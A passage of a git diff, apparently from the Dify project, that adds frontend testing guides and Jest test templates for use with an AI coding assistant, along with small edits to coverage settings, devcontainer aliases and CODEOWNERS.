+ ), +})) + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + mockPortalOpenState = false // ✅ Reset shared state + }) +}) +``` + +### 4. API Service Mocks + +```typescript +import * as api from '@/service/api' + +jest.mock('@/service/api') + +const mockedApi = api as jest.Mocked + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + + // Setup default mock implementation + mockedApi.fetchData.mockResolvedValue({ data: [] }) + }) + + it('should show data on success', async () => { + mockedApi.fetchData.mockResolvedValue({ data: [{ id: 1 }] }) + + render() + + await waitFor(() => { + expect(screen.getByText('1')).toBeInTheDocument() + }) + }) + + it('should show error on failure', async () => { + mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + + render() + + await waitFor(() => { + expect(screen.getByText(/error/i)).toBeInTheDocument() + }) + }) +}) +``` + +### 5. HTTP Mocking with Nock + +```typescript +import nock from 'nock' + +const GITHUB_HOST = 'https://api.github.com' +const GITHUB_PATH = '/repos/owner/repo' + +const mockGithubApi = (status: number, body: Record, delayMs = 0) => { + return nock(GITHUB_HOST) + .get(GITHUB_PATH) + .delay(delayMs) + .reply(status, body) +} + +describe('GithubComponent', () => { + afterEach(() => { + nock.cleanAll() + }) + + it('should display repo info', async () => { + mockGithubApi(200, { name: 'dify', stars: 1000 }) + + render() + + await waitFor(() => { + expect(screen.getByText('dify')).toBeInTheDocument() + }) + }) + + it('should handle API error', async () => { + mockGithubApi(500, { message: 'Server error' }) + + render() + + await waitFor(() => { + expect(screen.getByText(/error/i)).toBeInTheDocument() + }) + }) +}) +``` + +### 6. 
Context Providers + +```typescript +import { ProviderContext } from '@/context/provider-context' +import { createMockProviderContextValue, createMockPlan } from '@/__mocks__/provider-context' + +describe('Component with Context', () => { + it('should render for free plan', () => { + const mockContext = createMockPlan('sandbox') + + render( + + + + ) + + expect(screen.getByText('Upgrade')).toBeInTheDocument() + }) + + it('should render for pro plan', () => { + const mockContext = createMockPlan('professional') + + render( + + + + ) + + expect(screen.queryByText('Upgrade')).not.toBeInTheDocument() + }) +}) +``` + +### 7. SWR / React Query + +```typescript +// SWR +jest.mock('swr', () => ({ + __esModule: true, + default: jest.fn(), +})) + +import useSWR from 'swr' +const mockedUseSWR = useSWR as jest.Mock + +describe('Component with SWR', () => { + it('should show loading state', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + error: undefined, + isLoading: true, + }) + + render() + expect(screen.getByText(/loading/i)).toBeInTheDocument() + }) +}) + +// React Query +import { QueryClient, QueryClientProvider } from '@tanstack/react-query' + +const createTestQueryClient = () => new QueryClient({ + defaultOptions: { + queries: { retry: false }, + mutations: { retry: false }, + }, +}) + +const renderWithQueryClient = (ui: React.ReactElement) => { + const queryClient = createTestQueryClient() + return render( + + {ui} + + ) +} +``` + +## Mock Best Practices + +### ✅ DO + +1. **Use real base components** - Import from `@/app/components/base/` directly +1. **Use real project components** - Prefer importing over mocking +1. **Reset mocks in `beforeEach`**, not `afterEach` +1. **Match actual component behavior** in mocks (when mocking is necessary) +1. **Use factory functions** for complex mock data +1. **Import actual types** for type safety +1. **Reset shared mock state** in `beforeEach` + +### ❌ DON'T + +1. 
**Don't mock base components** (`Loading`, `Button`, `Tooltip`, etc.) +1. Don't mock components you can import directly +1. Don't create overly simplified mocks that miss conditional logic +1. Don't forget to clean up nock after each test +1. Don't use `any` types in mocks without necessity + +### Mock Decision Tree + +``` +Need to use a component in test? +│ +├─ Is it from @/app/components/base/*? +│ └─ YES → Import real component, DO NOT mock +│ +├─ Is it a project component? +│ └─ YES → Prefer importing real component +│ Only mock if setup is extremely complex +│ +├─ Is it an API service (@/service/*)? +│ └─ YES → Mock it +│ +├─ Is it a third-party lib with side effects? +│ └─ YES → Mock it (next/navigation, external SDKs) +│ +└─ Is it i18n? + └─ YES → Uses shared mock (auto-loaded). Override only for custom translations +``` + +## Factory Function Pattern + +```typescript +// __mocks__/data-factories.ts +import type { User, Project } from '@/types' + +export const createMockUser = (overrides: Partial = {}): User => ({ + id: 'user-1', + name: 'Test User', + email: 'test@example.com', + role: 'member', + createdAt: new Date().toISOString(), + ...overrides, +}) + +export const createMockProject = (overrides: Partial = {}): Project => ({ + id: 'project-1', + name: 'Test Project', + description: 'A test project', + owner: createMockUser(), + members: [], + createdAt: new Date().toISOString(), + ...overrides, +}) + +// Usage in tests +it('should display project owner', () => { + const project = createMockProject({ + owner: createMockUser({ name: 'John Doe' }), + }) + + render() + expect(screen.getByText('John Doe')).toBeInTheDocument() +}) +``` diff --git a/.claude/skills/frontend-testing/guides/workflow.md b/.claude/skills/frontend-testing/guides/workflow.md new file mode 100644 index 0000000000..b0f2994bde --- /dev/null +++ b/.claude/skills/frontend-testing/guides/workflow.md @@ -0,0 +1,269 @@ +# Testing Workflow Guide + +This guide defines the workflow for 
generating tests, especially for complex components or directories with multiple files. + +## Scope Clarification + +This guide addresses **multi-file workflow** (how to process multiple test files). For coverage requirements within a single test file, see `web/testing/testing.md` § Coverage Goals. + +| Scope | Rule | +|-------|------| +| **Single file** | Complete coverage in one generation (100% function, >95% branch) | +| **Multi-file directory** | Process one file at a time, verify each before proceeding | + +## ⚠️ Critical Rule: Incremental Approach for Multi-File Testing + +When testing a **directory with multiple files**, **NEVER generate all test files at once.** Use an incremental, verify-as-you-go approach. + +### Why Incremental? + +| Batch Approach (❌) | Incremental Approach (✅) | +|---------------------|---------------------------| +| Generate 5+ tests at once | Generate 1 test at a time | +| Run tests only at the end | Run test immediately after each file | +| Multiple failures compound | Single point of failure, easy to debug | +| Hard to identify root cause | Clear cause-effect relationship | +| Mock issues affect many files | Mock issues caught early | +| Messy git history | Clean, atomic commits possible | + +## Single File Workflow + +When testing a **single component, hook, or utility**: + +``` +1. Read source code completely +2. Run `pnpm analyze-component ` (if available) +3. Check complexity score and features detected +4. Write the test file +5. Run test: `pnpm test -- .spec.tsx` +6. Fix any failures +7. Verify coverage meets goals (100% function, >95% branch) +``` + +## Directory/Multi-File Workflow (MUST FOLLOW) + +When testing a **directory or multiple files**, follow this strict workflow: + +### Step 1: Analyze and Plan + +1. **List all files** that need tests in the directory +1. 
**Categorize by complexity**: + - 🟢 **Simple**: Utility functions, simple hooks, presentational components + - 🟡 **Medium**: Components with state, effects, or event handlers + - 🔴 **Complex**: Components with API calls, routing, or many dependencies +1. **Order by dependency**: Test dependencies before dependents +1. **Create a todo list** to track progress + +### Step 2: Determine Processing Order + +Process files in this recommended order: + +``` +1. Utility functions (simplest, no React) +2. Custom hooks (isolated logic) +3. Simple presentational components (few/no props) +4. Medium complexity components (state, effects) +5. Complex components (API, routing, many deps) +6. Container/index components (integration tests - last) +``` + +**Rationale**: + +- Simpler files help establish mock patterns +- Hooks used by components should be tested first +- Integration tests (index files) depend on child components working + +### Step 3: Process Each File Incrementally + +**For EACH file in the ordered list:** + +``` +┌─────────────────────────────────────────────┐ +│ 1. Write test file │ +│ 2. Run: pnpm test -- .spec.tsx │ +│ 3. If FAIL → Fix immediately, re-run │ +│ 4. If PASS → Mark complete in todo list │ +│ 5. ONLY THEN proceed to next file │ +└─────────────────────────────────────────────┘ +``` + +**DO NOT proceed to the next file until the current one passes.** + +### Step 4: Final Verification + +After all individual tests pass: + +```bash +# Run all tests in the directory together +pnpm test -- path/to/directory/ + +# Check coverage +pnpm test -- --coverage path/to/directory/ +``` + +## Component Complexity Guidelines + +Use `pnpm analyze-component ` to assess complexity before testing. 
+ +### 🔴 Very Complex Components (Complexity > 50) + +**Consider refactoring BEFORE testing:** + +- Break component into smaller, testable pieces +- Extract complex logic into custom hooks +- Separate container and presentational layers + +**If testing as-is:** + +- Use integration tests for complex workflows +- Use `test.each()` for data-driven testing +- Multiple `describe` blocks for organization +- Consider testing major sections separately + +### 🟡 Medium Complexity (Complexity 30-50) + +- Group related tests in `describe` blocks +- Test integration scenarios between internal parts +- Focus on state transitions and side effects +- Use helper functions to reduce test complexity + +### 🟢 Simple Components (Complexity < 30) + +- Standard test structure +- Focus on props, rendering, and edge cases +- Usually straightforward to test + +### 📏 Large Files (500+ lines) + +Regardless of complexity score: + +- **Strongly consider refactoring** before testing +- If testing as-is, test major sections separately +- Create helper functions for test setup +- May need multiple test files + +## Todo List Format + +When testing multiple files, use a todo list like this: + +``` +Testing: path/to/directory/ + +Ordered by complexity (simple → complex): + +☐ utils/helper.ts [utility, simple] +☐ hooks/use-custom-hook.ts [hook, simple] +☐ empty-state.tsx [component, simple] +☐ item-card.tsx [component, medium] +☐ list.tsx [component, complex] +☐ index.tsx [integration] + +Progress: 0/6 complete +``` + +Update status as you complete each: + +- ☐ → ⏳ (in progress) +- ⏳ → ✅ (complete and verified) +- ⏳ → ❌ (blocked, needs attention) + +## When to Stop and Verify + +**Always run tests after:** + +- Completing a test file +- Making changes to fix a failure +- Modifying shared mocks +- Updating test utilities or helpers + +**Signs you should pause:** + +- More than 2 consecutive test failures +- Mock-related errors appearing +- Unclear why a test is failing +- Test passing but coverage 
unexpectedly low + +## Common Pitfalls to Avoid + +### ❌ Don't: Generate Everything First + +``` +# BAD: Writing all files then testing +Write component-a.spec.tsx +Write component-b.spec.tsx +Write component-c.spec.tsx +Write component-d.spec.tsx +Run pnpm test ← Multiple failures, hard to debug +``` + +### ✅ Do: Verify Each Step + +``` +# GOOD: Incremental with verification +Write component-a.spec.tsx +Run pnpm test -- component-a.spec.tsx ✅ +Write component-b.spec.tsx +Run pnpm test -- component-b.spec.tsx ✅ +...continue... +``` + +### ❌ Don't: Skip Verification for "Simple" Components + +Even simple components can have: + +- Import errors +- Missing mock setup +- Incorrect assumptions about props + +**Always verify, regardless of perceived simplicity.** + +### ❌ Don't: Continue When Tests Fail + +Failing tests compound: + +- A mock issue in file A affects files B, C, D +- Fixing A later requires revisiting all dependent tests +- Time wasted on debugging cascading failures + +**Fix failures immediately before proceeding.** + +## Integration with Claude's Todo Feature + +When using Claude for multi-file testing: + +1. **Ask Claude to create a todo list** before starting +1. **Request one file at a time** or ensure Claude processes incrementally +1. **Verify each test passes** before asking for the next +1. **Mark todos complete** as you progress + +Example prompt: + +``` +Test all components in `path/to/directory/`. +First, analyze the directory and create a todo list ordered by complexity. +Then, process ONE file at a time, waiting for my confirmation that tests pass +before proceeding to the next. 
+``` + +## Summary Checklist + +Before starting multi-file testing: + +- [ ] Listed all files needing tests +- [ ] Ordered by complexity (simple → complex) +- [ ] Created todo list for tracking +- [ ] Understand dependencies between files + +During testing: + +- [ ] Processing ONE file at a time +- [ ] Running tests after EACH file +- [ ] Fixing failures BEFORE proceeding +- [ ] Updating todo list progress + +After completion: + +- [ ] All individual tests pass +- [ ] Full directory test run passes +- [ ] Coverage goals met +- [ ] Todo list shows all complete diff --git a/.claude/skills/frontend-testing/templates/component-test.template.tsx b/.claude/skills/frontend-testing/templates/component-test.template.tsx new file mode 100644 index 0000000000..f1ea71a3fd --- /dev/null +++ b/.claude/skills/frontend-testing/templates/component-test.template.tsx @@ -0,0 +1,296 @@ +/** + * Test Template for React Components + * + * WHY THIS STRUCTURE? + * - Organized sections make tests easy to navigate and maintain + * - Mocks at top ensure consistent test isolation + * - Factory functions reduce duplication and improve readability + * - describe blocks group related scenarios for better debugging + * + * INSTRUCTIONS: + * 1. Replace `ComponentName` with your component name + * 2. Update import path + * 3. Add/remove test sections based on component features (use analyze-component) + * 4. Follow AAA pattern: Arrange → Act → Assert + * + * RUN FIRST: pnpm analyze-component to identify required test scenarios + */ + +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +// import ComponentName from './index' + +// ============================================================================ +// Mocks +// ============================================================================ +// WHY: Mocks must be hoisted to top of file (Jest requirement). 
+// They run BEFORE imports, so keep them before component imports. + +// i18n (automatically mocked) +// WHY: Shared mock at web/__mocks__/react-i18next.ts is auto-loaded by Jest +// No explicit mock needed - it returns translation keys as-is +// Override only if custom translations are required: +// jest.mock('react-i18next', () => ({ +// useTranslation: () => ({ +// t: (key: string) => { +// const customTranslations: Record = { +// 'my.custom.key': 'Custom Translation', +// } +// return customTranslations[key] || key +// }, +// }), +// })) + +// Router (if component uses useRouter, usePathname, useSearchParams) +// WHY: Isolates tests from Next.js routing, enables testing navigation behavior +// const mockPush = jest.fn() +// jest.mock('next/navigation', () => ({ +// useRouter: () => ({ push: mockPush }), +// usePathname: () => '/test-path', +// })) + +// API services (if component fetches data) +// WHY: Prevents real network calls, enables testing all states (loading/success/error) +// jest.mock('@/service/api') +// import * as api from '@/service/api' +// const mockedApi = api as jest.Mocked + +// Shared mock state (for portal/dropdown components) +// WHY: Portal components like PortalToFollowElem need shared state between +// parent and child mocks to correctly simulate open/close behavior +// let mockOpenState = false + +// ============================================================================ +// Test Data Factories +// ============================================================================ +// WHY FACTORIES? 
+// - Avoid hard-coded test data scattered across tests +// - Easy to create variations with overrides +// - Type-safe when using actual types from source +// - Single source of truth for default test values + +// const createMockProps = (overrides = {}) => ({ +// // Default props that make component render successfully +// ...overrides, +// }) + +// const createMockItem = (overrides = {}) => ({ +// id: 'item-1', +// name: 'Test Item', +// ...overrides, +// }) + +// ============================================================================ +// Test Helpers +// ============================================================================ + +// const renderComponent = (props = {}) => { +// return render() +// } + +// ============================================================================ +// Tests +// ============================================================================ + +describe('ComponentName', () => { + // WHY beforeEach with clearAllMocks? + // - Ensures each test starts with clean slate + // - Prevents mock call history from leaking between tests + // - MUST be beforeEach (not afterEach) to reset BEFORE assertions like toHaveBeenCalledTimes + beforeEach(() => { + jest.clearAllMocks() + // Reset shared mock state if used (CRITICAL for portal/dropdown tests) + // mockOpenState = false + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED - Every component MUST have these) + // -------------------------------------------------------------------------- + // WHY: Catches import errors, missing providers, and basic render issues + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange - Setup data and mocks + // const props = createMockProps() + + // Act - Render the component + // render() + + // Assert - Verify expected output + // Prefer getByRole for accessibility; it's what users "see" + // expect(screen.getByRole('...')).toBeInTheDocument() + }) + + 
it('should render with default props', () => { + // WHY: Verifies component works without optional props + // render() + // expect(screen.getByText('...')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED - Every component MUST test prop behavior) + // -------------------------------------------------------------------------- + // WHY: Props are the component's API contract. Test them thoroughly. + describe('Props', () => { + it('should apply custom className', () => { + // WHY: Common pattern in Dify - components should merge custom classes + // render() + // expect(screen.getByTestId('component')).toHaveClass('custom-class') + }) + + it('should use default values for optional props', () => { + // WHY: Verifies TypeScript defaults work at runtime + // render() + // expect(screen.getByRole('...')).toHaveAttribute('...', 'default-value') + }) + }) + + // -------------------------------------------------------------------------- + // User Interactions (if component has event handlers - on*, handle*) + // -------------------------------------------------------------------------- + // WHY: Event handlers are core functionality. Test from user's perspective. + describe('User Interactions', () => { + it('should call onClick when clicked', async () => { + // WHY userEvent over fireEvent? 
+ // - userEvent simulates real user behavior (focus, hover, then click) + // - fireEvent is lower-level, doesn't trigger all browser events + // const user = userEvent.setup() + // const handleClick = jest.fn() + // render() + // + // await user.click(screen.getByRole('button')) + // + // expect(handleClick).toHaveBeenCalledTimes(1) + }) + + it('should call onChange when value changes', async () => { + // const user = userEvent.setup() + // const handleChange = jest.fn() + // render() + // + // await user.type(screen.getByRole('textbox'), 'new value') + // + // expect(handleChange).toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // State Management (if component uses useState/useReducer) + // -------------------------------------------------------------------------- + // WHY: Test state through observable UI changes, not internal state values + describe('State Management', () => { + it('should update state on interaction', async () => { + // WHY test via UI, not state? + // - State is implementation detail; UI is what users see + // - If UI works correctly, state must be correct + // const user = userEvent.setup() + // render() + // + // // Initial state - verify what user sees + // expect(screen.getByText('Initial')).toBeInTheDocument() + // + // // Trigger state change via user action + // await user.click(screen.getByRole('button')) + // + // // New state - verify UI updated + // expect(screen.getByText('Updated')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Async Operations (if component fetches data - useSWR, useQuery, fetch) + // -------------------------------------------------------------------------- + // WHY: Async operations have 3 states users experience: loading, success, error + describe('Async Operations', () => { + it('should show loading state', () => { + // WHY never-resolving promise? 
+ // - Keeps component in loading state for assertion + // - Alternative: use fake timers + // mockedApi.fetchData.mockImplementation(() => new Promise(() => {})) + // render() + // + // expect(screen.getByText(/loading/i)).toBeInTheDocument() + }) + + it('should show data on success', async () => { + // WHY waitFor? + // - Component updates asynchronously after fetch resolves + // - waitFor retries assertion until it passes or times out + // mockedApi.fetchData.mockResolvedValue({ items: ['Item 1'] }) + // render() + // + // await waitFor(() => { + // expect(screen.getByText('Item 1')).toBeInTheDocument() + // }) + }) + + it('should show error on failure', async () => { + // mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + // render() + // + // await waitFor(() => { + // expect(screen.getByText(/error/i)).toBeInTheDocument() + // }) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED - Every component MUST handle edge cases) + // -------------------------------------------------------------------------- + // WHY: Real-world data is messy. Components must handle: + // - Null/undefined from API failures or optional fields + // - Empty arrays/strings from user clearing data + // - Boundary values (0, MAX_INT, special characters) + describe('Edge Cases', () => { + it('should handle null value', () => { + // WHY test null specifically? + // - API might return null for missing data + // - Prevents "Cannot read property of null" in production + // render() + // expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle undefined value', () => { + // WHY test undefined separately from null? 
+ // - TypeScript treats them differently + // - Optional props are undefined, not null + // render() + // expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle empty array', () => { + // WHY: Empty state often needs special UI (e.g., "No items yet") + // render() + // expect(screen.getByText(/empty/i)).toBeInTheDocument() + }) + + it('should handle empty string', () => { + // WHY: Empty strings are truthy in JS but visually empty + // render() + // expect(screen.getByText(/placeholder/i)).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Accessibility (optional but recommended for Dify's enterprise users) + // -------------------------------------------------------------------------- + // WHY: Dify has enterprise customers who may require accessibility compliance + describe('Accessibility', () => { + it('should have accessible name', () => { + // WHY getByRole with name? + // - Tests that screen readers can identify the element + // - Enforces proper labeling practices + // render() + // expect(screen.getByRole('button', { name: /test label/i })).toBeInTheDocument() + }) + + it('should support keyboard navigation', async () => { + // WHY: Some users can't use a mouse + // const user = userEvent.setup() + // render() + // + // await user.tab() + // expect(screen.getByRole('button')).toHaveFocus() + }) + }) +}) diff --git a/.claude/skills/frontend-testing/templates/hook-test.template.ts b/.claude/skills/frontend-testing/templates/hook-test.template.ts new file mode 100644 index 0000000000..4fb7fd21ec --- /dev/null +++ b/.claude/skills/frontend-testing/templates/hook-test.template.ts @@ -0,0 +1,207 @@ +/** + * Test Template for Custom Hooks + * + * Instructions: + * 1. Replace `useHookName` with your hook name + * 2. Update import path + * 3. 
Add/remove test sections based on hook features + */ + +import { renderHook, act, waitFor } from '@testing-library/react' +// import { useHookName } from './use-hook-name' + +// ============================================================================ +// Mocks +// ============================================================================ + +// API services (if hook fetches data) +// jest.mock('@/service/api') +// import * as api from '@/service/api' +// const mockedApi = api as jest.Mocked + +// ============================================================================ +// Test Helpers +// ============================================================================ + +// Wrapper for hooks that need context +// const createWrapper = (contextValue = {}) => { +// return ({ children }: { children: React.ReactNode }) => ( +// +// {children} +// +// ) +// } + +// ============================================================================ +// Tests +// ============================================================================ + +describe('useHookName', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // -------------------------------------------------------------------------- + // Initial State + // -------------------------------------------------------------------------- + describe('Initial State', () => { + it('should return initial state', () => { + // const { result } = renderHook(() => useHookName()) + // + // expect(result.current.value).toBe(initialValue) + // expect(result.current.isLoading).toBe(false) + }) + + it('should accept initial value from props', () => { + // const { result } = renderHook(() => useHookName({ initialValue: 'custom' })) + // + // expect(result.current.value).toBe('custom') + }) + }) + + // -------------------------------------------------------------------------- + // State Updates + // -------------------------------------------------------------------------- + describe('State Updates', () => { + it('should update 
value when setValue is called', () => { + // const { result } = renderHook(() => useHookName()) + // + // act(() => { + // result.current.setValue('new value') + // }) + // + // expect(result.current.value).toBe('new value') + }) + + it('should reset to initial value', () => { + // const { result } = renderHook(() => useHookName({ initialValue: 'initial' })) + // + // act(() => { + // result.current.setValue('changed') + // }) + // expect(result.current.value).toBe('changed') + // + // act(() => { + // result.current.reset() + // }) + // expect(result.current.value).toBe('initial') + }) + }) + + // -------------------------------------------------------------------------- + // Async Operations + // -------------------------------------------------------------------------- + describe('Async Operations', () => { + it('should fetch data on mount', async () => { + // mockedApi.fetchData.mockResolvedValue({ data: 'test' }) + // + // const { result } = renderHook(() => useHookName()) + // + // // Initially loading + // expect(result.current.isLoading).toBe(true) + // + // // Wait for data + // await waitFor(() => { + // expect(result.current.isLoading).toBe(false) + // }) + // + // expect(result.current.data).toEqual({ data: 'test' }) + }) + + it('should handle fetch error', async () => { + // mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + // + // const { result } = renderHook(() => useHookName()) + // + // await waitFor(() => { + // expect(result.current.error).toBeTruthy() + // }) + // + // expect(result.current.error?.message).toBe('Network error') + }) + + it('should refetch when dependency changes', async () => { + // mockedApi.fetchData.mockResolvedValue({ data: 'test' }) + // + // const { result, rerender } = renderHook( + // ({ id }) => useHookName(id), + // { initialProps: { id: '1' } } + // ) + // + // await waitFor(() => { + // expect(mockedApi.fetchData).toHaveBeenCalledWith('1') + // }) + // + // rerender({ id: '2' }) + // + // await 
waitFor(() => { + // expect(mockedApi.fetchData).toHaveBeenCalledWith('2') + // }) + }) + }) + + // -------------------------------------------------------------------------- + // Side Effects + // -------------------------------------------------------------------------- + describe('Side Effects', () => { + it('should call callback when value changes', () => { + // const callback = jest.fn() + // const { result } = renderHook(() => useHookName({ onChange: callback })) + // + // act(() => { + // result.current.setValue('new value') + // }) + // + // expect(callback).toHaveBeenCalledWith('new value') + }) + + it('should cleanup on unmount', () => { + // const cleanup = jest.fn() + // jest.spyOn(window, 'addEventListener') + // jest.spyOn(window, 'removeEventListener') + // + // const { unmount } = renderHook(() => useHookName()) + // + // expect(window.addEventListener).toHaveBeenCalled() + // + // unmount() + // + // expect(window.removeEventListener).toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle null input', () => { + // const { result } = renderHook(() => useHookName(null)) + // + // expect(result.current.value).toBeNull() + }) + + it('should handle rapid updates', () => { + // const { result } = renderHook(() => useHookName()) + // + // act(() => { + // result.current.setValue('1') + // result.current.setValue('2') + // result.current.setValue('3') + // }) + // + // expect(result.current.value).toBe('3') + }) + }) + + // -------------------------------------------------------------------------- + // With Context (if hook uses context) + // -------------------------------------------------------------------------- + describe('With Context', () => { + it('should use context value', () => { + // const wrapper = createWrapper({ someValue: 'context-value' 
}) + // const { result } = renderHook(() => useHookName(), { wrapper }) + // + // expect(result.current.contextValue).toBe('context-value') + }) + }) +}) diff --git a/.claude/skills/frontend-testing/templates/utility-test.template.ts b/.claude/skills/frontend-testing/templates/utility-test.template.ts new file mode 100644 index 0000000000..ec13b5f5bd --- /dev/null +++ b/.claude/skills/frontend-testing/templates/utility-test.template.ts @@ -0,0 +1,154 @@ +/** + * Test Template for Utility Functions + * + * Instructions: + * 1. Replace `utilityFunction` with your function name + * 2. Update import path + * 3. Use test.each for data-driven tests + */ + +// import { utilityFunction } from './utility' + +// ============================================================================ +// Tests +// ============================================================================ + +describe('utilityFunction', () => { + // -------------------------------------------------------------------------- + // Basic Functionality + // -------------------------------------------------------------------------- + describe('Basic Functionality', () => { + it('should return expected result for valid input', () => { + // expect(utilityFunction('input')).toBe('expected-output') + }) + + it('should handle multiple arguments', () => { + // expect(utilityFunction('a', 'b', 'c')).toBe('abc') + }) + }) + + // -------------------------------------------------------------------------- + // Data-Driven Tests + // -------------------------------------------------------------------------- + describe('Input/Output Mapping', () => { + test.each([ + // [input, expected] + ['input1', 'output1'], + ['input2', 'output2'], + ['input3', 'output3'], + ])('should return %s for input %s', (input, expected) => { + // expect(utilityFunction(input)).toBe(expected) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases + // 
-------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle empty string', () => { + // expect(utilityFunction('')).toBe('') + }) + + it('should handle null', () => { + // expect(utilityFunction(null)).toBe(null) + // or + // expect(() => utilityFunction(null)).toThrow() + }) + + it('should handle undefined', () => { + // expect(utilityFunction(undefined)).toBe(undefined) + // or + // expect(() => utilityFunction(undefined)).toThrow() + }) + + it('should handle empty array', () => { + // expect(utilityFunction([])).toEqual([]) + }) + + it('should handle empty object', () => { + // expect(utilityFunction({})).toEqual({}) + }) + }) + + // -------------------------------------------------------------------------- + // Boundary Conditions + // -------------------------------------------------------------------------- + describe('Boundary Conditions', () => { + it('should handle minimum value', () => { + // expect(utilityFunction(0)).toBe(0) + }) + + it('should handle maximum value', () => { + // expect(utilityFunction(Number.MAX_SAFE_INTEGER)).toBe(...) + }) + + it('should handle negative numbers', () => { + // expect(utilityFunction(-1)).toBe(...) + }) + }) + + // -------------------------------------------------------------------------- + // Type Coercion (if applicable) + // -------------------------------------------------------------------------- + describe('Type Handling', () => { + it('should handle numeric string', () => { + // expect(utilityFunction('123')).toBe(123) + }) + + it('should handle boolean', () => { + // expect(utilityFunction(true)).toBe(...) 
+ }) + }) + + // -------------------------------------------------------------------------- + // Error Cases + // -------------------------------------------------------------------------- + describe('Error Handling', () => { + it('should throw for invalid input', () => { + // expect(() => utilityFunction('invalid')).toThrow('Error message') + }) + + it('should throw with specific error type', () => { + // expect(() => utilityFunction('invalid')).toThrow(ValidationError) + }) + }) + + // -------------------------------------------------------------------------- + // Complex Objects (if applicable) + // -------------------------------------------------------------------------- + describe('Object Handling', () => { + it('should preserve object structure', () => { + // const input = { a: 1, b: 2 } + // expect(utilityFunction(input)).toEqual({ a: 1, b: 2 }) + }) + + it('should handle nested objects', () => { + // const input = { nested: { deep: 'value' } } + // expect(utilityFunction(input)).toEqual({ nested: { deep: 'transformed' } }) + }) + + it('should not mutate input', () => { + // const input = { a: 1 } + // const inputCopy = { ...input } + // utilityFunction(input) + // expect(input).toEqual(inputCopy) + }) + }) + + // -------------------------------------------------------------------------- + // Array Handling (if applicable) + // -------------------------------------------------------------------------- + describe('Array Handling', () => { + it('should process all elements', () => { + // expect(utilityFunction([1, 2, 3])).toEqual([2, 4, 6]) + }) + + it('should handle single element array', () => { + // expect(utilityFunction([1])).toEqual([2]) + }) + + it('should preserve order', () => { + // expect(utilityFunction(['c', 'a', 'b'])).toEqual(['c', 'a', 'b']) + }) + }) +}) diff --git a/.coveragerc b/.coveragerc new file mode 100644 index 0000000000..190c0c185b --- /dev/null +++ b/.coveragerc @@ -0,0 +1,5 @@ +[run] +omit = + api/tests/* + api/migrations/* + 
api/core/rag/datasource/vdb/* diff --git a/.devcontainer/post_create_command.sh b/.devcontainer/post_create_command.sh index a26fd076ed..ce9135476f 100755 --- a/.devcontainer/post_create_command.sh +++ b/.devcontainer/post_create_command.sh @@ -6,7 +6,7 @@ cd web && pnpm install pipx install uv echo "alias start-api=\"cd $WORKSPACE_ROOT/api && uv run python -m flask run --host 0.0.0.0 --port=5001 --debug\"" >> ~/.bashrc -echo "alias start-worker=\"cd $WORKSPACE_ROOT/api && uv run python -m celery -A app.celery worker -P threads -c 1 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor\"" >> ~/.bashrc +echo "alias start-worker=\"cd $WORKSPACE_ROOT/api && uv run python -m celery -A app.celery worker -P threads -c 1 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention\"" >> ~/.bashrc echo "alias start-web=\"cd $WORKSPACE_ROOT/web && pnpm dev\"" >> ~/.bashrc echo "alias start-web-prod=\"cd $WORKSPACE_ROOT/web && pnpm build && pnpm start\"" >> ~/.bashrc echo "alias start-containers=\"cd $WORKSPACE_ROOT/docker && docker-compose -f docker-compose.middleware.yaml -p dify --env-file middleware.env up -d\"" >> ~/.bashrc diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index d6f326d4dc..06a60308c2 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -6,6 +6,12 @@ * @crazywoola @laipz8200 @Yeuoly +# CODEOWNERS file +.github/CODEOWNERS @laipz8200 @crazywoola + +# Docs +docs/ @crazywoola + # Backend (default owner, more specific rules below will override) api/ @QuantumGhost @@ -116,7 +122,7 @@ api/controllers/console/feature.py @GarfieldDai @GareArc api/controllers/web/feature.py @GarfieldDai @GareArc # 
Backend - Database Migrations -api/migrations/ @snakevash @laipz8200 +api/migrations/ @snakevash @laipz8200 @MRZHUH # Frontend web/ @iamjoel diff --git a/.github/copilot-instructions.md b/.github/copilot-instructions.md deleted file mode 100644 index 53afcbda1e..0000000000 --- a/.github/copilot-instructions.md +++ /dev/null @@ -1,12 +0,0 @@ -# Copilot Instructions - -GitHub Copilot must follow the unified frontend testing requirements documented in `web/testing/testing.md`. - -Key reminders: - -- Generate tests using the mandated tech stack, naming, and code style (AAA pattern, `fireEvent`, descriptive test names, cleans up mocks). -- Cover rendering, prop combinations, and edge cases by default; extend coverage for hooks, routing, async flows, and domain-specific components when applicable. -- Target >95% line and branch coverage and 100% function/statement coverage. -- Apply the project's mocking conventions for i18n, toast notifications, and Next.js utilities. - -Any suggestions from Copilot that conflict with `web/testing/testing.md` should be revised before acceptance. 
